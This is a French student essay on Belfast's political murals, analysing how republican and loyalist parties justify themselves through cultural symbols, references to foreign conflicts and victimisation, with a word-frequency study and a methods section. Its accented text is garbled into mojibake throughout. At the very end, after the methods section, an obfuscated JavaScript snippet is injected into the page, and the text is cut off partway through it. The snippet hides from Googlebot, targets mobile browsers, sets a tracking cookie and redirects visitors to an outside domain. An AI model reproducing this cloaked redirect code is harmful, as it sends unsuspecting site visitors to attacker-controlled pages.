Des symboles pour se justifier

A�Quels sont les diffA�rents registres de justification par les deux partis ?

Introduction : Plusieurs maniA?res de se justifier

Par Darell Bloch, AngA?le Canelli et Louis Romaneschi

Avant propos :

Dans cette A�tude nous traiterons des registres de justifications des deux partis. Pour faciliter la comprA�hension de notre recherche il est important de comprendre ce qua��est un registre de justification et A�galement comment qualifier les deux partis.

On peut appeler registre de justification un ensemble de caractA�ristiques trouvA�es dans un texte, un discours ou dans toute forme da��expression visuelle visant A� justifier la ou les action(s) rA�alisA�e(s) par la��acteur au regard du spectateur.

En ce qui concerne les deux partis, nous utiliserons donc trois faA�ons de les qualifier, A� savoir :

  • le parti plutA?t da��origine irelandaise, qui est nationaliste, rA�publicain et catholique;
  • le parti plutA?t da��origine anglaise, qui est unioniste, loyaliste et protestant.

  1. Introduction : Plusieurs maniA?res de se justifier

Les murals ne sont pas neutres. Ces peintures apparaissent petit A� petit dans les rues de Belfast en parallA?le avec le conflit qui oppose rA�publicains irlandais aux loyalistes, fidA?les A� la couronne britannique. Ces peintures murales ont un caractA?re fondamentalement politique : les partis belligA�rants utilisent ce moyen graphique afin de faire de la propagande, dA�marquer leur territoire, da��acquA�rir de nouveaux sympathisants, ou alors de menacer la��ennemi. Elles se positionnent da��un cA?tA� ou de la��autre des partis engagA�s en faisant rA�fA�rence A� des symboles, A� des personnages et A� des A�vA�nements historiques liA�s A� la��hA�ritage culturel de chaque parti. En utilisant cette dialectique les deux partis justifient leur prise de position dans le conflit. Chacune des murals comporte donc une dimension fortement idA�ologique malgrA� leur apparence pouvant paraA�tre neutre. Cette mobilisation de symboles religieux, militaristes, culturels et nationalistes sur les murals peut A?tre perA�ue comme un ensemble da��arguments lA�gitimant la��existence et les revendications de chacun des partis. A�Ces muralsA�ont une capacitA� da��impact politique directe sur la population et sur tout autre observateur puisqu’elles sont situA�esA�dans la��espace public. Apparaissant sous une forme artistique, les murals sont en rA�alitA� une forme de propagande visant A� ressasser le spectre de la��opposition entre catholiques et protestant, les murs de Belfast deviennent alors un enjeux important du conflit. A�La��objectif de notre recherche est de mettre en lumiA?re les diffA�rents registres de justification mobilisA�s par chacun des partis dans les murals et da��expliciter le sens que les partis veulent donner aux murals.

Pour ce faire nous allons analyser de maniA?re comparative les murals unionistes et les murals rA�publicaines. Nous prA�senterons un tableau graphique rA�pertoriant les symboles les plus frA�quents et explicitant leurs significations et histoire. Cette classification sera une clef de lecture de notre travail, qui mobilisera ces symboles afin da��expliquer les diffA�rents registres de justification du conflit. En effet, ce lexique appuiera notre recherche, qui dA�taillera les diffA�rentes maniA?res par lesquelles les partis mobilisent ce langage graphique A� leurs fins politiques et culturelles. Nous avons pu mis en exergueA�plusieurs registres de justification ; tout da��abord la��exacerbation de registres culturels irlandais ou loyalistes, le ralliement A� des conflits internationaux, et enfin la victimisation de chacun des partis.

Exacerbation de la culture :

Le premier registre de justification que nous traitonsA�est celui de l’exacerbation culturelle, ou ce que nous intitulonsA�a�?la��hyperculturalisationa�?. Cet outil conceptuel utilisA� pour notre analyse se dA�finit par la volontA� da��une communautA� de se crA�er et de mobiliser un patrimoine culturel qui lui est propre. La��hyperculturalisation se caractA�rise par la grande utilisation de toutes sortes de particularitA�s culturelles communautaires A� des fins de diffA�renciation, par rapport au parti adverse. Ca��est une crA�ation de la��altA�ritA�, un processus qui a pour but de renforcer la��appartenance A� la��identitA� culturelle de son parti. Dans cette pA�riode post-conflit, A� Belfast, cette exacerbation de la culture est bel et bien encore utilisA�e, A� des fins politiques, historiques et mA�morielles. Cette logique que la��on pourrait considA�rerA�comme une mobilisation trA?s marquA�e da��un hA�ritage, va diffA�rer entre protestants et catholiques, et dA�passer le cadre des murals en se retrouvant dans plusieurs aspects de la vie quotidienne.

A la��A�chelle gA�ographique da��une ville qui na��est pas plus grande que GenA?ve, ces logiques da��hyperculturalisation peuvent en effet A?tre trA?s marquA�es: on identifierait un protestant ou un catholique A� travers son style vestimentaire, sa faA�on de sa��exprimer, son lieu de rA�sidence. Nous retrouvons ces aspects de diffA�renciation que ce soit dans la��usage de la langue gaA�lique, parlA�e exclusivement par des communautA�s catholiques, ou mA?me jusque dans les sports pratiquA�s: le football A�tant plus pratiquA� par les catholiques alors que le rugby est plus commun chez les protestants. Notre sujet da��analyse A�tant les murales, nous ne nous attarderons guA?re sur la��exacerbation culturelle dans les comportements sociaux, mais traiterons le sujet A� travers les symboles prA�sent dans la��iconographie des murales. Nous procA�derons en faisant une analyse comparative des logiques da��utilisation symbolique de chacun des partis, tout en illustrant nos propos avec quelques exemples. Par ailleurs, notre grille des symboles (annexe 1) permettra de rA�fA�rencer et de situer les symboles les plus importants afin de ne pas reprendre ces A�lA�ments dans la��analyse.

Tout da��abord, aprA?s avoir analyser les murales photographiA�es lors de nos terrains, nous pouvons distinguer dans les grandes lignes des logiques de mobilisation symboliques, allant sur des axes distincts, selon la��appartenance de la murale au clan unioniste ou rA�publicain.

Chez les unionistes, le registre symbolique est trA?s militarisA�A�etA�rendu historique; ce qui donne aux murales protestantes une dimension politique assez marquA�e. Ce constat se fait tout da��abord par leur composition, souvent rA�gie pour mettre en avant un blason, entourA� da��autres symboles (drapeaux, miniatures de personnages). La position centrale du blason qui incorpore la plupart du temps un drapeau de la��Union Jack, une couronne et la main rouge de la��Ulster (voir tableau en annexe), rappelle la centralitA� du pouvoir monarchique, avec les A�lA�ments qui la��entourent relA�guA�s au second plan, de par leur subordination hiA�rarchique. Dans ce cas, nous sommes face A� une vA�ritable prise de position en faveur de la culture monarchique, exacerbA�e par la mise en place da��une justification A� travers plusieurs symboles unionistes. Des A�lA�ments voulant dA�montrer la force militaire et A�conomique du Royaume-Uni sont A�galement avancA�s dans les murales loyalistes. Autour du blason central, des sujets rA�currents tels que les guerres mondiales, la puissance de la��Empire et la��importance de sa flotte (en grande partie construite dans le port de Belfast) constituent un argumentaire de la force du Royaume-Uni A� la��A�chelle locale et internationale. Ce a�?culte de la��Empirea�? est spA�cifique aux loyalistes qui vont chercher leur appui dans sa grandeur historique et A�conomique, et par des reprA�sentations de la matA�rialitA� de cette grandeur : bateaux, avions, troupes, bA?timents etc.. Cette matA�rialitA� de la force se retrouve dans les murales loyalistes reprA�sentant des milices de dA�fense armA�es, avec la plupart du temps un personnage cagoulA� brandissant une arme A� feu. Dans ce genre de murales, nous restons dans une logique da��explicitation de la force da��attaque, sa��illustrant A� travers la menace des symboles da��un a�?gunmana�? et de son arme pointA�e.

La reprA�sentation de personnages historiques, da��A�vA?nements marquants ou de monuments symboliques est A�galement frA�quente dans les fresques protestantes. Nous les voyons par exemple dans des murales dA�diA�es A� Oliver Cromwell (figure politique de la 1A?re rA�volution anglaise), de la bataille de la Somme, etca�� Les nombreuses allusions et commA�morations de ces personnages et A�vA?nements traduisent le dA�sir de sa��approprier et da��utiliser les faits du passA� pour justifier une cause prA�sente. Il y a alors une rA�interprA�tation et une manipulation de la��hA�ritage culturel et historique pour le mobiliser dans un contexte ou cet hA�ritage participera A� la distinction entre protestants et catholiques.

Du cA?tA� rA�publicain, l’exacerbation de la culture est A�galement trA?s marquA�e. Le registre symbolique rA�publicain est pourtant assez diffA�rent de celui des loyalistes et est fortement alimentA� par la��hA�ritage culturel gaA�lique et irlandais. La composition est trA?s rarement centrA�e sur un A�lA�ment en particulier, mais en favorise la��intA�gration de plusieurs. La grande mobilisation de symboles mythologiques montre le dA�sir des rA�publicains de se justifier A� travers la��anciennetA� de leurs racines, qui irait au delA� mA?me de la��A?re chrA�tienne. Harpes, divers tribaux irlandais, trA?fles et spirales servent A� la fois da��ornementation, et A� la fois de rappel de la��appartenance A� une culture ancestrale, plus pacifique et finalement moins politisA�e que la symbolique protestante. La��aspect plus colorA� et moins graphique des murales rA�publicaines sa��oppose au conformisme des murales protestantes, plus froides et directes et rappelant vaguement une iconographie qui se rapprocherait de propagandes fascistes et communistes. Le choix des couleurs na��est pas anodin : le vert rappelle dA�jA� la��Irlande, mais ca��est aussi le symbole de la paix et de la��espoir, en opposition avec le rouge plus violent utilisA� par les loyalistes. La��argument avancA� par les rA�publicains est le folklore inhA�rent A� la culture irlandaise, qui de par son caractA?re sympathique, peut A?tre interprA�tA� comme la��opposA� du cA?tA� menaA�ant de certaines murales loyalistes. Un aspect rA�current dans les murales rA�publicaines est la reprA�sentation de la rA�sistance, qui peut A?tre soit symbolisA�e par un phA�nix A�mergeant de ses cendres, soit par un paramilitaire non cagoulA� pointant son arme vers le ciel da��une pose dynamique. Nous remarquons ici que la��exacerbation de la solidaritA� A� travers la��adversitA�, de la bravoure et de l’hA�roA?sme est un trait de caractA?re que la communautA� catholique a essayA� de transparaA�tre au travers des murales.

A�Affiliation a des conflits A�trangers

Il est difficile de connaA�tre la part de vA�ritA� que les rA�cits des deux partis contiennent. Les conflits, nous la��avons compris, perdurent encore aujourda��hui. Leur A�tendue a da��ailleurs permit A� plusieurs gA�nA�rations belfastoises de vivre ce conflit. NA�anmoins il est A�vident que les gA�nA�rations actuelles ont des opinions diffA�rentes de celles des gA�nA�rations prA�cA�dentes. Il en est de mA?me pour la visibilitA� extA�rieure de la��histoire des troubles, celle ci a A�voluA� de maniA?re croissante depuis leurs dA�buts. Aujourda��hui, la population intA�ressA�e par les murales et par la��histoire de Belfast possA?de de nombreux moyens da��accA�der aux informations dA�sirA�es en comparaison avec la pA�riode durant laquelle les conflits ont dA�butA�, ca��est A� dire durant les annA�es 1920.

PrA�cA�demment, nous avons dA�taillA� la maniA?re avec laquelle les deux partis revendiquent au public extA�rieur leur culture, A� savoir par exemple, la culture celtique pour les nationalistes et la culture anglaise pour les loyalistes. Mais la��on ne trouve pas ces symboles culturels sur la totalitA� des murals. En effet, avec la��augmentation de la visibilitA�, ca��est A� dire la��exposition des faits des conflits au reste du monde, les partis ont du dA�velopper un ensemble da��arguments plus vaste que leurs arguments culturels. Nous allons donc voir dans cette partie les moyens visuels mis en oeuvre par les partis afin de rallier leur cause A� da��autres conflits internationaux. Autrement dit, comment les deux partis dA�fendent leur cause et leur opinion grA?ce aux illustrations des murals en puisant dans le contexte historique international. Cet effet ayant pour but de maximiser le soutien international.

En commenA�ant par le parti rA�publicain, on remarque que celui ci compare sa position avec la position da��autres groupes plus ou moins analogues ayant comme point commun le caractA?re minoritaire rA�primA� ou la��appartenance A� un peuple ne pouvant pas disposer de lui mA?me et tyrannisA�. Le parti est solidaire de beaucoup de minoritA�s injustement opprimA�es ou discriminA�es pour leurs opinions, leur appartenance ou leur sexualitA�. Les causes reviennent aux oppressions des homosexuels jusqua��A� la��oppression du peuple cubain. Nous pouvons notamment voir sur le mural A�ci dessous, qua��un dA�saccord est A�clairement exprimA� avec la politique da��Obama vis A� vis du peuple cubain. Le parti sa��engage A�galement A� reprA�senter le conflit territorial des Pays Basques.

Capture da��A�cran 2016-05-23 A� 17.49.54

On trouve ensuite un nombre important de murals nationalistes faisant rA�fA�rence au parti palestinien. Les signes reconnaissables sont ici, le drapeau de la Palestine et ses couleurs, la��utilisation de contenus textuels en calligraphie palestinienne.

Capture da��A�cran 2016-05-23 A� 17.50.06

Les nationalistes soulignent que ce peuple est soumis au joug da��un A�tat illA�gitime ne respectant pas le droit international. Les nationalistes rA�publicains sa��approprient le soutien rA�ciproque des conflit A�trangers, mais aussi se comparent directement A� des personnages internationaux connus et vus par une majoritA� de la population comme exemplaires ou respectables. Par exemple, comme on peut le voir dans la peinture murale reprA�sentant Bobby Sands et Nelson Mandela cA?te A� cA?te.

Capture da��A�cran 2016-05-23 A� 18.00.05

Le message est limpide, Nelson Mandela a combattu un rA�gime politique illA�gitime et violent et a A�tA� emprisonnA�, tout comme Bobby Sands. On peut aussi voir, non loin du lieu oA? plusieurs personnes ont A�tA� tuA�es pendant le Bloody Sunday, une reproduction du Tres de mayo de Goya (ci dessous) pour rappeler les tirs des parachutistes sur des civils, ce qui peut s’apparenter A� une exA�cution sommaire. Cette dA�marche de victimisation est encore plus efficace en utilisant des symboles internationaux et un registre mA�moriel connus de tous.

Capture da��A�cran 2016-05-23 A� 18.00.12

Lorsque la��on observe les murals du parti loyaliste, on trouve une rA�fA�rence frA�quente A� un peuple A�extA�rieur la��aidant A� justifier sa position. Cette rA�fA�rence revient au peuple israA�lien en contexte de conflit israA�lo-palestinien. En effet, le parti loyaliste est en accord avec le fond idA�ologique, la forme de la��A�tat et aussi avec le mode da��action, plus gA�nA�ralement, est da��accord avec la��attitude inflexible de la��A�tat IsraA�l ainsi que sur ses actions militaires envers les terroristes et la population civile. De plus les loyalistes expliquent qua��IsraA�l est le pays le plus prospA?re A�conomiquement de la rA�gion, donc le modA?le qui ressort le plus gagnant de la situation de conflit. Ils mettent ce point de vue en lien avec la situation de la��Irlande du Nord, considA�rant que la rA�gion doit sa rA�ussite da��antan A� son intA�gration dans la Grande-Bretagne.A�Les protestants, eux plutA?t que de prendre une position victimaire, justifient leurs actions violentes en rA�actions aux actes terroristes des unionistes.

Victimisation des partis

Nous faisons la��usage dans cette partie du terme victimisation et de ses dA�rivA�s. Nous entendons par a�?victimisera�? la��acte ou parole visant A� rendre son parti victime aux regards de la population extA�rieure au conflit, ainsi qua��en tant que justification des actions offensives ou dA�fensives envers la��autre camp. Aussi, da��aprA?s la DA�claration des Principes Fondamentaux de Justice Relatifs aux Victimes de la criminalitA� et aux victimes d’abus de pouvoir, lesA�victimes sont dA�finies comme a�?des personnes qui, individuellement ou collectivement, ont subi un prA�judice, notamment une atteinte A� leur intA�gritA� physique ou mentale, une souffrance morale, une perte matA�rielle, ou une atteinte grave A� leurs droits fondamentaux, en raison d’actes A�ou d’omissions qui A�enfreignent A�les A�lois pA�nales en vigueur A�dans A�un A�Etat membre, A�y A�comprisA�celles qui proscrivent les abus criminels de pouvoir.a�?

  • MA�moriel des victimes

IMG_09372222

Le but du mA�morial est de rendre hommage A� des victimes de guerres ou da��A�vA?nements particuliA?rement tragiques. Le mA�morial sert aussi A� commA�morer un A�vA?nement important pour une communautA� en terme de changement A�conomique, politique ou social. Le monument, ou le lieu, mis A� disposition na��est pas simplement un espace ou un objet concret, il contient une dimension abstraite et il est vecteur da��une mA�moire collective. Ainsi, les lieux de mA�moires sont respectA�s par toute personne concernA�e parA�la morale collective, quasiment universelle, liA�e au respect des morts et de ce qui les englobe.

Au travers deA�ces mA�moriaux, on rend hommage A� des victimes et on permet A�galement le deuil collectif de la communautA� concernA�e. La ville de Belfast possA?de un grand nombre de mA�moriauxA�dont la plupart sont situA�s principalement dans les quartiers encore sA�paratistes. Cela sa��explique enA�raisonA�des nombreux conflits intra-muros subis dA?sA�1920 avec le projet da��autonomie de la��Irlande, alorsA�sous la domination de la Grande-Bretagne rA�gisA�par Home Rule. Ca��est A� partir de cette proposition que des tensions entre les rA�publicains nationalistes de Belfast et les loyalistes unionistes dA�butA?rent, prenant de plus en plus da��ampleur et menant A� plusieurs conflits civils, appelA�s troubles, jusque dans les annA�es 1990. Ca��est parce que ces conflits engendrA?rent de nombreux morts que la mise en place de monuments mA�moriaux fut nA�cessaire. NA�anmoins, il semblerait que malgrA� les actes de paix conclusA�entreA�les communautA�s de Belfast, les dissensionsA�perdurent au sein mA?me de ces lieux de mA�moire. En effet, le cas de Belfast est particulier puisqua��on trouve dans la ville des mA�moriaux peints, accompagnA�s de murals colorA�es relatives aux troubles. Sur ces murals on peut apercevoir des visages de personnalitA�s importantes dans les conflits aux cA?tA�s de symboles liA�s aux religions ou aux cultures des deux partis.

On peut considA�rerA�que la rA�alisation da��un monument mA�moriel reprA�sente en quelques sortes une prise de position A� partir du moment oA? la��on rend hommage aux morts da��un seul camp et pas de la��autre. A�On peut donc considA�rer que le spectateur – supposA� neutre – va se placer automatiquement da��un cA?tA� ou de la��autre des deux camps. En ajoutant, comme A� Belfast, des visages et des symboles trA?s dA�taillA�s aux mA�moriaux, la sensibilitA� du spectateur est touchA�e car celui ci va sa��identifier plus facilement aux partisans du mA�morial. Le spectateur est nettement moins A�mu sa��il na��a en face de lui qua��une liste de noms de victimes auxquelles il ne peut se rA�fA�rer. En revanche, il est fort probable qu’un touriste, pA?re de famille, voyant en face de luiA�se dresser une peinture murale reprA�sentant des enfants expliquantA�que ces derniersA�furentA�tuA�s par les forces da��un des deux partis, le pA?reA�va se sentir concernA� et son opinion sur le conflit en sera influencA�e. Il est fort probable que la��image associA�e A� la description favorise cette sensation. Le monument, alors envisagA� comme vecteur da��idA�e pacifiste au premier abord, aurait plutA?t tendance A� faire perdurer la conflictualitA�, da��autant plus sa��il est accompagnA� par une mural renforA�ant le pouvoir da��identification sur leA�spectateur.

Sachant que le dark tourism est trA?s dA�veloppA� dans cette ville, on peut A�mettre la��hypothA?se que les mA�moriaux aux victimes ne sont pas uniquement crA�A�s pour les populations locales et protagonistes du conflit mais qua��elles se dirigent vers les touristes. En effet, il est possible que les murals peintes aux cA?tA�s des mA�moriaux soient mobilisA�es afin de victimiser le parti concernA� envers la��autre et face A� la��opinion internationale. Ainsi, grA?ce A� la dimension sensiblement touchante de la jonction mA�morial-murals, les partis se victimisent et se dA�chargent donc en partie de la responsabilitA� des dommages humains et matA�riels dus aux troubles.

Nous avons donc vu que la justification des actions des partis dans les conflits est prA�sente au travers de symboles dans les murals. Nous avons prA�cA�demment avancA� la��idA�e que les partis cherchent A� rallier les observateurs extA�rieurs aux conflits dans leur camp, en disposant notamment les murals de maniA?re A� toucher le spectateur et A� se placer en tant que victime dans le conflit. Dans cette partie nous expliquerons comment ce mA?me processus de victimisation est prA�sent dans les textes des murals. GrA?ce au plan dA�taillA� du site http://www.belfast-murals.co.uk, un A�chantillon de cinquante murals (vingt cinq murals unionistes et vingt cinq murals loyalistes) fut utilisA� afin da��A�tudier le champ lexical utilisA� dans ces peintures. Nous chercherons A� montrer que les deux partis ne font pas usage des mA?mes mots et que cela traduit deux maniA?res da��expliquer le conflit. Le tableau ci dessous rA�pertorie les rA�sultats de la��analyse de contenu.

content analysisNous pouvons donc observer dans notre A�chantillon grA?ce au tableau plusieurs champs lexicaux ressortant des mots utilisA�s pour reprA�senter les partis unionistes et loyalistes. Ces champs lexicaux sont de trois ordres : la lutte, les rA�fA�rences territoriales et communautaires et le post-conflictualisme.

  • Analyse du champs lexical de la lutte :

Le tableau prA�cA�dent montreA�que le parti loyaliste utilise plus de mots liA�s A� la lutte que le parti nationaliste. Le mot militantsA�est visible sur environ vingt pour cent des murals loyalistes (da��aprA?s notre A�chantillon de vingt cinq murals) tandis que le mot le plus frA�quemment utilisA� pour les rA�publicains est resistance. Ces deux mots ne sont pas en opposition mais ne se dA�finissent pas de la mA?me maniA?re; ainsi da��aprA?s la dA�finition anglaise du site Merriam Webster, militant signifie A� having or showing A�a A�desire A�or A�A�willingness A�A�to A�use A�A�strong, A�A�extreme, A�A�A�and A�A�A�A�A�sometimes forceful methods to achieve somethingA�A? (Simple dA�finition of militants [en ligne] http://www.merriam-webster.com/dictionary/militant) Ce mot est donc synonyme en anglais da��action politique ou idA�ologique violente. En ce qui concerne le mot resistance, toujours da��aprA?s la mA?me source, la dA�finition est la suivante : A�refusal to accept something new or different A� ou A�effort made to stop or to fight against someone or something A�A? (Simple dA�finition of resistance [en ligne] http://www.merriam-webster.com/dictionary/resistance). Autrement dit, la��acte de rA�sistance na��inclue pas nA�cessairement un acte violent.

En tenant compte des autres mots utilisA�s par le parti loyaliste tels que guns, attacked, conflict on rA�aliseA�la diffA�rente vision des troubles par chacun des partis. Pour parler du conflit, le parti loyaliste fait A�plus appel A�A�la dimension brutale et armA�e du conflit. A� l’opposA�, le parti rA�publicain utilise les mots brave, oppression, fall, faisant plutA?t rA�fA�rence A� un champ lexical de la survie. Les rA�publicains se dA�crivent donc plus comme A�tant en position dominA�e ou alors en position de subsistance face A� une force supA�rieure politique opposA�e et offensive. A�

  • Analyse du champs lexical post-conflictualiste:

En ce qui concerne la dimension post-conflictualiste, les murals des deux camps font une utilisation commune de mots tel que freedom. La��usage de ce mot (libertA�) pourrait faire rA�fA�rence A� la��ultime but vers lequel tend la ville de Belfast. La diffA�rence da��usage du mot par les deux partis rA�side ici dans les extensions employA�es. En effet, freedom est utilisA� sous diffA�rentes dA�rivA�es par le parti nationaliste rA�publicain, on peut donc lire dans les quartiers rA�publicains les termes free, free union ou encore liberation A� plusieurs localisations.

Le deuxiA?me mot le plus utilisA� par le parti loyaliste unioniste est murder, alors que celui na��est visible qua��une seule fois de la��autre cA?tA� du conflit. Nous pouvons noter A�galement que la devise du parti loyaliste : A� no surrender A� apparait deux fois parmi notre A�chantillon. Ce slogan est A�A�contre-sensA�de la��idA�ologie pacifiste puisque qua��elle se traduit par A� ne pas renoncer A�. Elle est depuis longtemps utilisA�e par le parti, qui considA?re que les conflits na��auront de fin que lorsque la��autre camp aura cA�dA�, autrement dit, le parti pour la gouvernance anglaise exprime son mA�contentement envers la��idA�e de trouver un terrain da��entente mettant fin aux tensions.

Les deux partis font enfin rA�fA�rence aux victimes et aux combattants ayant servit leur communautA�. La��usage de murder est frA�quent pour les loyalistes tandis qua��il na��apparaA�t qua��une fois chez les nationalistes. Enfin, on peut noter le terme martyrs utilisA� par les nationalistes, impliquant directement la souffrance notamment da��aprA?s le dictionnaire anglais Merriam Webster A�a�?a person who is killed or who suffers greatly for a religion, cause, etc..a�? (simple definition of martyr [en ligne] http://www.merriam-webster.com/dictionary/martyr)

Plus largement, il est remarquable que les partis anglais voient en la situation post-conflit un espoir de victoire progressive sur le camp opposA�. A l’inverse, le vocabulaire utilisA� par les nationalistes, pourrait indiquer que ceux ci revendiquent une plus forte volontA� de paix. De plus, ces derniers font un usage frA�quent de mots relatifs au martyre et A� une position, encore, de victimes premiA?res de ces troubles.

  • Analyse du champs lexical de territorialitA� et de communautarisme:

Ce champ lexical est peu reprA�sentA� comparA� aux deux autres ressortis de la��A�tude, nA�anmoins on peut remarquer deux niveaux da��appartenance des partis.

Le parti rA�publicains nationaliste A� tendanceA�A� valoriser les origines celtiques et irlandaises tandis que le parti loyaliste lA�gitime directement sa prA�sence en Ireland du Nord de part la��appropriation des toponymes Ulster, North Belfast. Ce parti loyaliste se considA?re A�galement comme une A�quipe (team) alors que la��on retrouve plutA?t la��idA�e de communautA� du cA?tA� des nationalistes. Enfin, on peut remarquer au sein de notre A�chantillon une diffA�rence da��A�chelle lorsqua��il sa��agit des protagonistes du conflits. En effet nous pouvons trouver dans les murals loyalistes le terme royalty, menant directement au sommet de la gouvernance recherchA�e, alors que les nationalistes emploient le terme civil A� deux reprises. La volontA� de reprA�senter les populations concernA�es dans le conflit est donc diffA�rente selon les partis, la vision est soit micro, soit macro.

A la suite de cette analyse de contenu, nousA�distinguons deux mentalitA�s. En effet, nous avons observA� que les partis na��A�valuent pas de la mA?me maniA?re leur rA?le dans le conflit. Quand les loyalistes prA?nent la puissance de leurs armA�es et troupes militantes qui ne renonceront jamais A� la lutte, les nationalistes, A� la��opposA�, na��A�voquent pratiquement pas leurs actions violentes dans le conflit. Au contraire, aprA?s cette analyse nous pouvons remarquer que ceux ci ont tendance A� A�voquer leurs forces de rA�sistances et donc intrinsA?quement, leur statut de victime en recherche de processus de paix. Quant au registre de justification, l’analyse de contenu dA�montre queA�les anglais loyalistes justifient leurs actions en faisant rA�fA�rence textuellement A� leur connaissance du territoire nord-irlandais afin de prouver leur prA�sence ancienne et comme A� logique A� sur ce territoire. Ainsi, ils lA�gitiment les troubles et assument la dA�fense da��un territoire qua��ils considA?rent acquis. En parallA?le, les irlandais rA�publicains remontent jusqua��aux origines celtiques pour revendiquer leur appartenance A� un peuple irlandais avant mA?me la��existence dune population anglo-irlandaise.

Symboles les plus prA�sents
Symboles les plus prA�sents

cliquer pour agrandir le tableau

MA�thode utilisA�e :

Afin de rA�aliser au mieux notre enquA?te nous avons eu besoin da��obtenir de la��information formelle et de la��information informelle; mais principalement da��informations qualitatives. Nous avons A�galement optA� pour une approche interprA�tative, ca��est A� dire da��A�tudier les sources A� notre disposition afin de comprendre la culture en question.

Analyse documentaire :

Nous avons premiA?rement choisi da��analyser les sources littA�raires prA�existantes A� propos de la��histoire de Belfast et de ses murals. Munis de deux livres rA�pertoriant chaque mural de Belfast, de cartes A� diffA�rentes A�chelles pour diffA�rentes utilisation ainsi que de prospectus touristiques nous avons entamA� notre recherche da��informations officielles sur la��histoire des conflits de Belfast. Ces documents A�taient en libre accA?s A� la bibliothA?que et A�galement A� la��office du tourisme. La netnographie, autrement dit, les recherches web furent le deuxiA?me moyen da��obtenir des donnA�es formelles sur le conflit et notamment sur les nombreux symboles peints dans les murals.

EnquA?tes qualitatives :

Nous dA�finissons les informations informelles comme la��ensemble des informations tirA�es des discours A�mis par des personnes rencontrA�es durant le sA�jour A� Belfast. Ces informations sont qualtitatives, il nous a donc fallu rA�aliser des entretiens ethnographiques. AprA?s avoir dA�fini des axes pour notre recherche par entretien, nous avons cherchA� A� interroger des habitants de Belfast lors de nos recherches libres sur le terrain, dans le but da��obtenir diffA�rents avis protestant/unionistes ou avis catholique/nationalistes. Allant des explications des libraires de la bibliothA?que centrale aux rA�cits de personnes lambda interrogA�es dans la rue, nous avons donnA� tout autant da��importance A� ces sources basA�es sur des conversations orales qua��A� celles de nos livres et sites internet. Pour consolider les donnA�es reccueillies, nous avons fait de la��observation directe lorsque nous avons notA� ce qui nous paraissait pertinent pour notre recherche pendant les visites organisA�es, (comme par exemple les rA�fA�rences aux autres conflits internationaux ou les explications liA�es aux symboles des drapeaux qui sont A�normA�ment reproduis sur les murals). Nous na��avons pas enregistrA� nos entretiens mais nous avons optA� pour la prise de note.

 

Observation et analyse de contenu visuel :A�

Etant donnA� la��ampleur des reprA�sentations symboliques que la��on trouve sur les objets destinA�s aux touristes il nous paraissait intA�ressant de nous pencher sur le sujet. Tout en effectuant cette collecte da��informations nous avons repA�rA� le plus de symboles possibles sur les murals afin de les photographier. La��utilisation de photographies permet A� la fois de soutenir nos propos, da��apporter des informations essentielles A� notre recherche de rA�currences symboliques et de comprendre les registres de justifications utilisA�s. Pour obtenir des informations pertinentes nous avons donc choisi de photographier les dA�tails des murals, ca��est A� dire les symboles reprA�sentA�s. NA�anmoins, pour quelques exceptions nous avons photographiA� le mural en entier, car celui ci contenait plusieurs des symboles qui nous intA�ressaient. Un lA�ger tri des photos a nA�anmoins A�tA� nA�cessaire A� la rentrA�e A� la��auberge dans le but de ne garder que la��essentiel des informations visuelles enregistrA�es. Nous avons catA�gorisA� les symboles selon leur origine culturelle et religieuse. Il nous fallait un exemplaire de chaque symbole aperA�u et ca��est pourquoi un surplus da��images non triA�es ne permettait pas une analyse efficace. La mA�thode photographique fut essentielle afin de comprendre par quels moyens visuels les partis mettent ils en avant leurs revendications.

Observation et analyse de contenu textuel :

AprA?s avoir sA�lectionnA� les symboles sur les murals, nous avons choisi de travailler sur le contenu textuel de celles ci. Il nous a donc fallu effectuer une analyse de contenu de dA�marche inductive. La premiA?re A�tape fut de choisir un A�chantillon de cinquante murals (parmi nos photographies et parmi des photographies tirA�es da��internet) puis da��en extraire tout le contenu textuel. Ensuite, nous avons codifiA� la��A�chantillon, plus prA�cisA�ment nous avons pu identifier les thA?mes et champs lexicaux principaux, ce qui nous a permit de crA�er des catA�gories et de pouvoir classer chaque mot trouvA� dans la��A�chantillon de murals dans une catA�gorie, de lui donner une A�tiquette. Puis grA?ce A� ce classement nous avons pu mettre en avant les rA�sultats quant aux rA�gularitA� da��utilisation de certains champs lexicaux par un parti ou par la��autre.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s 